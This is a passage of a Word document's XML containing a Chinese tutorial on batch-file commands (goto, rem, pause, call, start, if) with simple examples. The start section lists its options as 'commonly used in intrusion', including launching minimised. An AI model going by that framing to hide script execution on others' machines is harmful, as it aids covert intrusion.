        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>语法：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>goto label (label</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>是参数，指定所要转向的批处理程序中的行。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指定跳转到标签行，找到标签行后，程序将处理从下一行开始的命令。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  label</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>标签的名字可以随便起，但是最好是有意义的，字母前必须加个冒号</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“:”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>来表示这个字母是标签。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  goto</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令就是根据这个冒号来寻找下一步跳到到那里。经常与</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>配合使用，根据不同的条件来执行不同的命令组。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>例题见</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">“5.Pause </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">4.Rem </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>语法：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Rem Message...</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>小技巧：用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>::</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>代替</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>rem)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>注释命令，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>语言中相当与</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/*...*/,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>它并不会被执行，只是起一个注释的作用，便于别人阅读和自己日后修改。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>@Rem Here is the description.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">5.Pause </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>会暂停批处理的执行并在屏幕上显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Press any key to continue...</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的提示，等待用户按任意键后继续</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22" name="图片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r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   @echo off</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   :begin</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   copy a:*.* d:\back</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   echo Please put a new disk into driver A</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   pause</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   goto begin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="190500" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21" name="图片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r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在这个例子中，驱动器</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>中磁盘上的所有文件均复制到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>d:\back</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>中。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示的信息提示您将另一张磁盘放入驱动器</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> A </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">pause </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令会使程序挂起，以便您更换磁盘，然后按任意键再次复制。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">6.Call </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>语法</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>: call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">: [Drive:][Path] FileName  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指定要调用的批处理程序的位置和名称。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">filename </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数必须具有</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> .bat </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> .cmd </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>扩展名。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>调用另一个批处理程序，并且不终止父批处理程序。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果不用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>而直接调用别的批处理文件，那么执行完那个批处理文件后将无法返回当前文件并执行当前文件的后续命令。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  call </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令接受用作调用目标的标签。如果在脚本或批处理文件外使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> Call</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，它将不会在命令行起作用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>call="%cd%\test2.bat" haha kkk aaa    (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>调用指定目录下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> test2.bat</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，且输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>个参数给他</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>call test2.bat arg1 arg2    (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>调用同目录下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> test2.bat</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，且输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>个参数给他</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>注：可以调用自身</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>死循环、递归</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">7.start </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>调用外部程序，所有的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令行程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>都可以由</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> start</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>来调用。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>入侵常用参数：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        MIN </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>开始时窗口最小化</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        SEPARATE </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在分开的空间内开始</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> 16 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>位</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        HIGH </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> HIGH </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>优先级类别开始应用程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        REALTIME </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> REALTIME </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>优先级类别开始应用程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        WAIT </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>启动应用程序并等候它结束</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">        parameters </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>这些为传送到命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>程序的参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>start /MIN test2.bat arg1 arg2    (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>调用同目录下的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> test2.bat</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，且输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>个参数给他，且本窗口最小化</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  Sample</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>e:\"program files"\</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>极品列车时刻表</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>\jpskb.exe  (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件路径名有空格时</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">8.If </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表示将判断是否符合规定的条件，从而决定执行不同的命令。有三种格式</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  1) IF</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>语法</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>: if [not] "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>" == "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>字符串</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>待执行的命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数如果等于</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(not</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表示不等，下同</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指定的字符串，则条件成立，运行命令，否则运行下一句。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>注意是两个等号</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">   Sample: if "%1" == "a" format a:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">   Sample: if {%1} == {} goto noparms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  2) if exist</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>语法</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>: if [not] exist [</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>路径</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>\]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>待执行的命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果有指定的文件，则条件成立，运行命令，否则运行下一句。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">     Sample: if exist config.sys edit config.sys   (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表示如果存在这文件，则编辑它，用很难看的系统编辑器</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     Sample: if exist config.sys type config.sys   (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>表示如果存在这文件，则显示它的内容</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  3) if errorlevel number</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>语法</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>: if [not] errorlevel &lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>数字</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>待执行的命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果程序返回值等于指定的数字，则条件成立，运行命令，否则运行下一句。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>返回值必须按照从大到小的顺序排列</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">     Sample:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       @echo off</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       XCOPY F:\test.bat D:\</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       IF ERRORLEVEL 1 (ECHO </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件拷贝失败</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       ) Else IF ERRORLEVEL 0 ECHO </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>成功拷贝文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">       pause</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D5E" w:rsidRPr="00D84D5E" w:rsidRDefault="00D84D5E" w:rsidP="00D84D5E">
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>很多</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>程序在运行结束后会返回一个数字值用来表示程序运行的结果</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或者状态</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，称为错误码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>errorlevel</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>或称返回码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>常见的返回码为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>。通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>if errorlevel</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令可以判断程序的返回值，根据不同的返回值来决定执行不同的命令。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">  4) else</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>语法：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>条件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>成立时执行的命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>) else (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>不成立时执行的命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>)</w:t>
      </w:r>
